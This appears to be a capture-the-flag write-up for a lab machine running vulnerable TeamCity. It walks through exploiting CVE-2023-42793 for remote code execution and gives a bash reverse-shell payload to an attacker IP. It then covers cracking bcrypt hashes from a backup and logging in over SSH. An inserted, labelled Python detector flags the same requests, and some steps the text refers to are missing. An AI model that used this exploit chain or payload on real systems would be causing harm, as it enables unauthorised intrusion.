This is an Ubuntu 22.04 machine hosting a vulnerable version of TeamCity (CVE-2023-42793), which can be exploited to get a foothold on the system. Then we locate private keys and usernames stored in the file system and move laterally to users with privileges to read the user flag. For privilege escalation, a Portainer application running as root is abused.
KEYWORDS
TeamCity, CVE-2023-42793, port forwarding, Portainer.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-20 15:31 EDT
Nmap scan report for 10.10.11.13
Host is up, received user-set (0.078s latency).
Not shown: 64465 closed tcp ports (conn-refused), 1067 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
8000/tcp open http-alt syn-ack
Nmap done: 1 IP address (1 host up) scanned in 14.57 seconds
Enumerate the open ports.
> nmap $target -p22,80,8000 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-20 15:31 EDT
Nmap scan report for 10.10.11.13
Host is up, received user-set (0.072s latency).
Scanned at 2024-04-20 15:31:57 EDT for 12s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
| 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open nagios-nsca syn-ack Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 12.86 seconds
There are several PoCs on GitHub, but I couldn't make any of them work, so I decided to exploit the application manually. This was also used as a reference: https://github.com/hotplugin0x01/CVE-2023-42793
First, delete any previous authentication token by querying this endpoint: /app/rest/users/<userLocator>/tokens/RPC2
The next step is to configure the debug API so that admins can trigger configuration reloads, which enables arbitrary RCE. For this, use the previously obtained token.
Now you can issue commands. Insert the binary name in the exePath parameter and the rest of the arguments in as many params fields as you need. The following is an example issuing a reverse shell payload (/bin/bash -c bash -i >& /dev/tcp/10.10.xxx.xxx/1919 0>&1).
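As an added defender-side illustration (not part of the original write-up), the following Python script flags the request pattern described above in nginx-style access logs: any request to the RPC2 token endpoint, a DELETE followed shortly by a POST to it from the same client, and any request carrying an exePath parameter. The log lines are constructed, and the endpoint on the exePath line is a placeholder, since the write-up only names the parameter.

```python
import re
from datetime import datetime

# Constructed nginx-style access-log lines for illustration; not real data from the machine.
# The endpoint on the exePath line is a placeholder: the write-up only names the parameter,
# so the detection keys on the parameter name rather than on a path.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Apr/2024:15:40:01 -0400] "GET /login.html HTTP/1.1" 200 1832
10.10.14.5 - - [20/Apr/2024:15:40:03 -0400] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 204 0
10.10.14.5 - - [20/Apr/2024:15:40:04 -0400] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 266
10.10.14.5 - - [20/Apr/2024:15:40:06 -0400] "POST /app/rest/PLACEHOLDER-ENDPOINT?exePath=/bin/bash&params=-c HTTP/1.1" 200 12
10.10.14.9 - - [20/Apr/2024:15:41:10 -0400] "GET /app/rest/users HTTP/1.1" 200 540
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
RPC2_RE = re.compile(r"^/app/rest/users/[^/]+/tokens/RPC2$")
EXEPATH_RE = re.compile(r"[?&]exePath=", re.IGNORECASE)


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["target"].split("?", 1)[0]  # strip the query string
    return rec


def find_token_abuse(log_text, window_seconds=60):
    """Return (client_ip, timestamp, reason) alerts for the CVE-2023-42793 request pattern."""
    alerts = []
    last_delete = {}  # client ip -> time of its most recent DELETE on an RPC2 token endpoint
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if RPC2_RE.match(rec["path"]):
            alerts.append((ip, ts, f"{rec['method']} to RPC2 token endpoint"))
            if rec["method"] == "DELETE":
                last_delete[ip] = ts
            elif rec["method"] == "POST" and ip in last_delete \
                    and (ts - last_delete[ip]).total_seconds() <= window_seconds:
                alerts.append((ip, ts, "DELETE then POST to RPC2 token endpoint: token reset sequence"))
        if EXEPATH_RE.search(rec["target"]):
            alerts.append((ip, ts, "request carries an exePath parameter"))
    return alerts
```

Calling find_token_abuse(SAMPLE_LOG) yields four alerts, all for 10.10.14.5; the unrelated GET to /app/rest/users from the other client produces none.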
Nice to know, but useless for the moment since we don't have a username, so we need to look further. We found several database backups here: /data/teamcity_server/datadir/backup
Inside TeamCity_Backup_20240421_145357.zip, in the database_dump folder, we find a dump of the users table that contains password hashes for the users john@runner.htb and matthew@runner.htb.
John's seems uncrackable, but Matthew's is crackable (hashcat's bcrypt/Blowfish mode, -m 3200).
> hashcat -m 3200 -a 0 -d 1 hash.txt .\rockyou.txt
Take note of this password; we will use it afterwards. Now that we have two usernames, we can test the private key we found before. It works with the username john, and we get an SSH shell on the host, which can be used to retrieve the user flag.
ROOT
Start from the SSH shell for user john and take the opportunity to enumerate the current user and the system.
> id && whoami
uid=1001(john) gid=1001(john) groups=1001(john)
> uname -a && cat /etc/os-release
Linux runner 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.4 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.4 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy